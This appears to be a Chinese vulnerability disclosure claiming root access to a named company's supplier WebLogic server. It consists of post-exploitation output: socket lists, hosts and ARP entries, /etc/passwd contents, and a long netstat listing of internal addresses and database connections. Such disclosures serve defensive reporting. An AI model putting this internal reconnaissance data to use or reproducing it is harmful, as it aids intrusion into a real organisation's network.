f1000e00027b3c08 dgram 0 0 f1000a0280cf1020 0 0 0 /dev/.SRC-unix/SRC1-asij
f1000e0001cab800
f1000e00027bbc08 stream 0 0 f1000a0281216420 0 0 0 /var/cim/elasocket_cimv2
f1000e0000051100
f1000e00027ba808 dgram 0 0 f1000a0281142020 0 0 0 /dev/.SRC-unix/SRC5Xasik
f1000e0001cabd00
f1000e00027bc408 stream 0 0 f1000a02813d5c20 0 0 0 /var/ct/IW/soc/mc/rmsrv
f1000e0001cab600
f1000e00027b8008 stream 0 0 f1000a0281345c20 0 0 0 /var/ct/IW/soc/mc/clsrv
f1000e0001cab880
f1000e00027b7008 stream 0 0 f1000a0281457020 0 0 0 /var/ct/IW/soc/mc/RMIBM.DRM.0
f1000e0001cab380
f1000e00027bc808 stream 0 0 f1000a0281359420 0 0 0 /var/ct/IW/soc/mc/RMIBM.ServiceRM.0
f1000e0001cab680
f1000e00027bb808 stream 0 0 0 f1000e00027bff80 0 0
f1000e0001cab900
f1000e00027b8408 dgram 0 0 0 f1000e0001cabf00 0 f1000e0000f67980
f1000e00027bfe00
f1000e00027b3808 dgram 0 0 f1000a02813b6420 0 0 0 /dev/.SRC-unix/SRCcXasim
f1000e0001cab100
f1000e00027bc008 stream 0 0 f1000a02813a7020 0 0 0 /var/ct/IW/soc/mc/RMIBM.CSMAgentRM.0
f1000e0001cab200
f1000e00027be408 stream 0 0 0 f1000e0001cab300 0 0
f1000e0001cab000
f1000e00027b7408 stream 0 0 0 f1000e0001cab700 0 0
f1000e0001cabd80
f1000e00027ed808 stream 0 0 f1000a029bb9b820 0 0 0 /var/ct/IW/soc/mc/RMIBM.MgmtDomainRM.0
f1000e00027bf080
f1000e0002e4a008 dgram 0 0 0 f1000e0001cabf00 0 f1000e00027bfe00
f1000e00027bfd80
f1000e00027e3808 stream 0 0 0 0 0 0
f1000e0003389780
f1000e0002caa808 stream 0 0 0 0 0 0
f1000e0003499e00
f1000e0002865c08 dgram 0 0 0 f1000e0001cabf00 0 f1000e00027bfd80
f1000e00029eac00
f1000e0000a21808 dgram 0 0 f1000a028085f420 0 0 0 /dev/.SRC-unix/SRCsXasia
f1000e0000a28800
f1000e0000521008 dgram 0 0 f1000a02806cf420 0 0 0 /dev/SRC
f1000e0000520180
f1000e0000f66808 dgram 0 0 f1000a02811f0c20 0 0 0 /dev/.SRC-unix/SRCz-asig
f1000e0000f67300
f1000e000053d008 dgram 0 0 0 f1000e0001cabf00 0 f1000e0001cab780
f1000e0000520c80
f1000e0000f66408 dgram 0 0 f1000a0281110c20 0 0 0 /dev/.SRC-unix/SRCz-asie
f1000e0000f67480
f1000e0000a2d808 dgram 0 0 0 f1000e0001cabf00 0 0
f1000e0000a28300
f1000e000053d408 stream 0 0 f1000a02810f3820 0 0 0 /etc/cluster/clcomd_sec
f1000e0000520a00
f1000e0000a3a408 stream 0 0 0 0 0 0
f1000e0000a28a00
f1000e0000f75008 dgram 0 0 0 f1000e0001cabf00 0 f1000e0000520c80
f1000e0000f67980
f1000e0000f75c08 dgram 0 0 f1000a0281329020 0 0 0 /dev/.SRC-unix/SRCjXasiq
f1000e0000f26200
f1000e0000529c08 dgram 0 0 f1000a0281317020 0 0 0 /dev/.SRC-unix/SRCeHasin
f1000e0000520480
f1000e0000f88408 dgram 0 0 f1000a0281301420 0 0 0 /dev/.SRC-unix/SRCXXasil
f1000e0000f67200
f1000e00027bd008 stream 0 0 0 f1000e0001cab000 0 0 /var/ct/IW/soc/mc/RMIBM.CSMAgentRM.0
f1000e0001cab300
f1000e00027b8808 stream 0 0 0 f1000e0001cab900 0 0 /var/ct/IW/soc/mc/RMIBM.ServiceRM.0
f1000e00027bff80
f1000e00027bac08 stream 0 0 0 f1000e0001cabd80 0 0 /var/ct/IW/soc/mc/RMIBM.DRM.0
f1000e0001cab700
f1000e0000a26008 stream 0 0 f1000a028169d020 0 0 0 /opt/freeware/cimom/pegasus/etc/cimxml.socket
f1000e0000a28700
f1000e0005019c08 stream 0 0 0 0 0 0
f1000e0000f67f80
f1000e0006a64008 stream 0 0 0 0 0 0
f1000e0001b13300
f1000e000507a808 stream 0 0 0 0 0 0
f1000e00049b9500
f1000e000bd2d008 stream 0 0 0 0 0 0
f1000e0001a1cb80
f1000e000496d408 dgram 0 0 f1000a029bb6b820 0 0 0 /dev/.SRC-unix/SRCcXasEC
f1000e00049be900
f1000e000498b408 stream 0 0 0 f1000e00049bd600 0 0
f1000e00049b5980
f1000e0004971808 stream 0 0 0 f1000e00049b5980 0 0 /var/ct/IW/soc/mc/RMIBM.MgmtDomainRM.0
f1000e00049bd600
f1000e0006b0f008 stream 0 0 0 0 0 0
f1000e0008fdfb80
f1000e0000ac2008 stream 0 0 0 0 0 0
f1000e0002059080
f1000e0000b2fc08 stream 0 0 0 0 0 0
f1000e0000a28100


探测一下内网:
好详细

# @(#)47	1.2  src/bos/usr/sbin/netstart/hosts, cmdnet, bos61D, d2007_49A2 10/1/07 13:57:52
# IBM_PROLOG_BEGIN_TAG
# This is an automatically generated prolog.
#
# bos61D src/bos/usr/sbin/netstart/hosts 1.2
#
# Licensed Materials - Property of IBM
#
# COPYRIGHT International Business Machines Corp. 1985,1989
# All Rights Reserved
#
# US Government Users Restricted Rights - Use, duplication or
# disclosure restricted by GSA ADP Schedule Contract with IBM Corp.
#
# IBM_PROLOG_END_TAG
#
# COMPONENT_NAME: TCPIP hosts
#
# FUNCTIONS: loopback
#
# ORIGINS: 26 27
#
# (C) COPYRIGHT International Business Machines Corp. 1985, 1989
# All Rights Reserved
# Licensed Materials - Property of IBM
#
# US Government Users Restricted Rights - Use, duplication or
# disclosure restricted by GSA ADP Schedule Contract with IBM Corp.
#
# /etc/hosts
#
# This file contains the hostnames and their address for hosts in the
# network. This file is used to resolve a hostname into an Internet
# address.
#
# At minimum, this file must contain the name and address for each
# device defined for TCP in your /etc/net file. It may also contain
# entries for well-known (reserved) names such as timeserver
# and printserver as well as any other host name and address.
#
# The format of this file is:
# Internet Address Hostname # Comments
# Internet Address can be either IPv4 or IPv6 address.
# Items are separated by any number of blanks and/or tabs. A '#'
# indicates the beginning of a comment; characters up to the end of the
# line are not interpreted by routines which search this file. Blank
# lines are allowed.
# Internet Address Hostname # Comments
# 192.9.200.1 net0sample # ethernet name/address
# 128.100.0.1 token0sample # token ring name/address
# 10.2.0.2 x25sample # x.25 name/address
# 2000:1:1:1:209:6bff:feee:2b7f ipv6sample # ipv6 name/address
127.0.0.1 loopback localhost # loopback (lo0) name/address
10.5.86.190 localhost
10.5.86.191 localhost
10.2.188.177 localhost


?(10.2.188.1)位于0:9:f:9:0:a [ethernet] stored in bucket 51
?(10.2.188.178)位于0:15:17:6f:26:fd [ethernet] stored in bucket 79
?(10.2.188.82)位于d8:9d:67:32:ca:27 [ethernet] stored in bucket 132


漏洞证明:

站点:是供应商系统

http://supplier.sinopec.com:9001


存在weblogic应用
root权限

D7@EK14`FRM5{LWB4P}2CED.png


root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:6:12::/var/adm/invscout:/usr/bin/ksh
snapp:*:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
ipsec:*:201:1::/etc/ipsec:/usr/bin/ksh
nuucp:*:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
pconsole:*:8:0::/var/adm/pconsole:/usr/bin/ksh
esaadmin:*:10:0::/var/esa:/usr/bin/ksh
supp:!:202:1::/supftp:/usr/bin/bsh


活动的 Internet 连接 (包括服务器)
Proto Recv-Q Send-Q 本地地址 外部地址 (状态)
tcp 0 0 *.* *.* CLOSED
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.13 *.* LISTEN
tcp 0 0 *.21 *.* LISTEN
tcp 0 0 *.23 *.* LISTEN
tcp4 0 0 *.25 *.* LISTEN
tcp4 0 0 *.37 *.* LISTEN
tcp4 0 0 *.111 *.* LISTEN
tcp 0 0 *.199 *.* LISTEN
tcp4 0 0 10.2.188.177.9001 202.96.41.9.46152 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 202.96.41.9.46172 ESTABLISHED
tcp 0 0 10.2.188.177.51524 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 202.96.41.9.46288 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 202.96.41.9.46313 ESTABLISHED
tcp 0 0 *.427 *.* LISTEN
tcp 0 0 10.2.188.177.51603 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.51664 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.512 *.* LISTEN
tcp 0 0 *.513 *.* LISTEN
tcp 0 0 *.514 *.* LISTEN
tcp 0 0 10.2.188.177.51689 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.657 *.* LISTEN
tcp 0 0 10.2.188.177.52068 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.52250 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 *.1334 *.* LISTEN
tcp 0 0 10.2.188.177.52754 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.137.64.51.57721 ESTABLISHED
tcp 0 0 10.2.188.177.53322 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.54216 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.54694 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 219.149.59.150.55344 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 219.149.59.150.55345 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 219.149.59.150.55346 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 219.149.59.150.55347 ESTABLISHED
tcp4 0 0 10.2.188.177.7007 10.248.250.61.56077 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53080 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53081 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53125 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53126 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53127 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53129 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53130 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53131 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53132 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.5.99.1.54194 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.5.99.1.54315 FIN_WAIT_2
tcp 0 0 10.2.188.177.56082 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.5001 *.* LISTEN
tcp 0 0 *.5335 *.* LISTEN
tcp 0 0 *.5336 *.* LISTEN
tcp 0 0 *.5988 *.* LISTEN
tcp 0 0 *.5989 *.* LISTEN
tcp 0 0 *.6181 *.* LISTEN
tcp 0 0 10.2.188.177.57401 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.32959 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57460 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57461 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57463 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57465 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57468 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57470 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57471 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57473 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57474 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57476 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57477 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57478 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57479 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57481 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57486 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57487 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.23 10.5.24.34.1524 ESTABLISHED
tcp 0 0 10.2.188.177.57491 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57496 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57498 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57502 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57509 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57513 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57517 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57521 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57533 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57535 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57536 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57554 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57558 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57563 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57571 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57572 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57604 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.33423 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57967 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.33493 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.33587 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.6987 *.* LISTEN
tcp 0 0 10.2.188.177.59098 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 111.206.20.58.1982 ESTABLISHED
tcp 0 0 10.2.188.177.34761 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.102.170.25.3268 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.102.170.25.3271 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62977 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62978 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62979 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62980 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62981 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62984 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62986 FIN_WAIT_2
tcp 0 0 *.32769 *.* LISTEN
tcp4 0 0 *.32773 *.* LISTEN
tcp4 0 0 *.32774 *.* LISTEN
tcp 0 0 *.32779 *.* LISTEN
tcp 0 0 *.32785 *.* LISTEN
tcp 0 0 10.2.188.177.35050 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 111.206.20.58.2433 ESTABLISHED
tcp 0 0 10.2.188.177.35227 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 *.9090 *.* LISTEN
tcp 0 0 10.2.188.177.35769 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.36060 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.9510 *.* LISTEN
tcp 0 0 10.2.188.177.60765 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.36691 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.61660 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.37323 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.61992 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.62035 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.62101 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.80 *.* LISTEN
tcp 0 0 10.2.188.177.62354 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.38117 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.62625 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.62672 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.38737 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.38781 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.39007 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.63559 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.39062 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.63622 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.63759 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.39287 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.63797 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.63869 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.238.163.162.63135 ESTABLISHED
tcp4 0 0 10.2.188.177.7001 10.2.188.177.57428 ESTABLISHED
tcp 0 0 10.2.188.177.57428 10.2.188.177.7001 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.238.163.162.63138 ESTABLISHED
tcp4 0 0 10.2.188.177.7001 10.2.188.177.57429 ESTABLISHED
tcp 0 0 10.2.188.177.57429 10.2.188.177.7001 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.238.163.162.63142 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.238.163.162.63150 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.238.163.162.63151 ESTABLISHED
tcp 0 0 10.2.188.177.64103 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.61950 *.* LISTEN
tcp 0 0 10.2.188.177.64208 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.64263 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.39845 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.39982 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 127.0.0.1.9514 *.* LISTEN
tcp4 0 0 127.0.0.1.9515 *.* LISTEN
tcp 0 0 10.2.188.177.40096 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.64663 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 118.144.194.162.15992 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.15993 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.15994 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16004 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16007 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16008 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16009 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16010 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16011 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16012 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16013 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16014 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16015 FIN_WAIT_2
tcp 0 0 10.2.188.177.40276 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.64800 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.40459 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.40738 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.14248 *.* LISTEN
tcp 0 0 10.2.188.177.65497 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41256 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41713 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41714 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41715 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41716 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41718 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41719 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41720 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41721 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41722 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41727 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41728 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41729 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41730 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41731 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41732 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41733 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41734 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41735 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41736 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41737 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41738 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41739 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41740 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41741 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41742 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41743 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41744 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41745 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41746 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41747 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 111.206.20.58.9302 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 111.206.20.58.9313 ESTABLISHED
tcp 0 0 10.2.188.177.42742 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.16191 *.* LISTEN
tcp4 0 0 127.0.0.1.199 127.0.0.1.32768 ESTABLISHED
tcp4 0 0 127.0.0.1.32768 127.0.0.1.199 ESTABLISHED
tcp 0 0 10.2.188.177.43221 10.5.86.196.1521 ESTABLISHED
tcp6 0 0 ::1.32777 ::1.32778 CLOSE_WAIT
tcp4 0 0 10.2.188.177.7001 10.2.188.178.61303 ESTABLISHED
tcp4 0 0 10.2.188.177.7001 10.2.188.178.61304 ESTABLISHED
tcp 0 0 10.2.188.177.43565 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.7001 10.2.188.177.37434 ESTABLISHED
tcp 0 0 10.2.188.177.37434 10.2.188.177.7001 ESTABLISHED
tcp 0 0 10.2.188.177.44112 10.5.86.197.1521 ESTABLISHED
tcp 0 0 10.2.188.177.7001 *.* LISTEN
tcp 0 0 10.2.188.177.7003 *.* LISTEN
tcp 0 0 10.2.188.177.7004 *.* LISTEN
tcp 0 0 10.2.188.177.7007 *.* LISTEN
tcp4 0 0 10.2.188.177.9002 10.2.188.178.60923 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55165 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55166 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55172 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55173 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55174 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55175 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55176 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55177 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55178 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55185 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49822 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49824 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49828 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49829 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49830 ESTABLISHED
tcp4 0 1214 10.2.188.177.80 10.175.1.126.49831 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49832 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49833 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49834 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49841 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 101.71.243.74.59784 ESTABLISHED
tcp4 0 0 10.2.188.177.9002 10.2.188.177.61594 ESTABLISHED
tcp 0 0 10.2.188.177.61594 10.2.188.177.9002 ESTABLISHED
tcp4 0 0 10.2.188.177.9002 10.2.188.177.61607 ESTABLISHED
tcp 0 0 10.2.188.177.61607 10.2.188.177.9002 ESTABLISHED
tcp4 0 0 10.2.188.177.9002 10.2.188.177.61608 ESTABLISHED
tcp 0 0 10.2.188.177.61608 10.2.188.177.9002 ESTABLISHED
tcp4 0 0 10.2.188.177.9002 10.2.188.177.61609 ESTABLISHED
tcp 0 0 10.2.188.177.61609 10.2.188.177.9002 ESTABLISHED
tcp 0 0 10.2.188.177.61614 10.2.188.178.9003 ESTABLISHED
tcp 0 0 10.2.188.177.45799 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.45862 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.46035 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 101.71.243.74.60787 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 101.71.243.74.60788 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 101.71.243.74.60789 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 101.71.243.74.60790 ESTABLISHED
tcp 0 0 10.2.188.177.9001 *.* LISTEN
tcp 0 0 10.2.188.177.9002 *.* LISTEN
tcp 0 0 10.2.188.177.9003 *.* LISTEN
tcp4 0 0 10.2.188.177.80 10.81.48.118.1481 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19964 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19970 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19975 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19976 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19978 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19979 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.20028 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.20048 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.20049 FIN_WAIT_2
tcp 0 0 10.2.188.177.40426 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40581 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40653 10.2.188.178.7003 ESTABLISHED
tcp 0 0 10.2.188.177.40684 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40747 10.2.188.178.7004 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.84.13.79.59402 ESTABLISHED
tcp 0 0 10.2.188.177.40843 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40853 10.2.188.177.7004 TIME_WAIT
tcp 0 0 10.2.188.177.40855 10.2.188.177.7004 TIME_WAIT
tcp 0 0 10.2.188.177.40857 10.2.188.177.7004 TIME_WAIT
tcp 0 0 10.2.188.177.40863 10.2.188.177.7004 TIME_WAIT
tcp 0 0 10.2.188.177.40864 10.2.188.177.7004 TIME_WAIT
tcp 0 0 10.2.188.177.40867 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40868 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40886 10.2.188.178.7003 ESTABLISHED
tcp 0 0 10.2.188.177.40891 10.2.188.178.7003 ESTABLISHED
tcp 0 0 10.2.188.177.40892 10.2.188.178.7003 ESTABLISHED
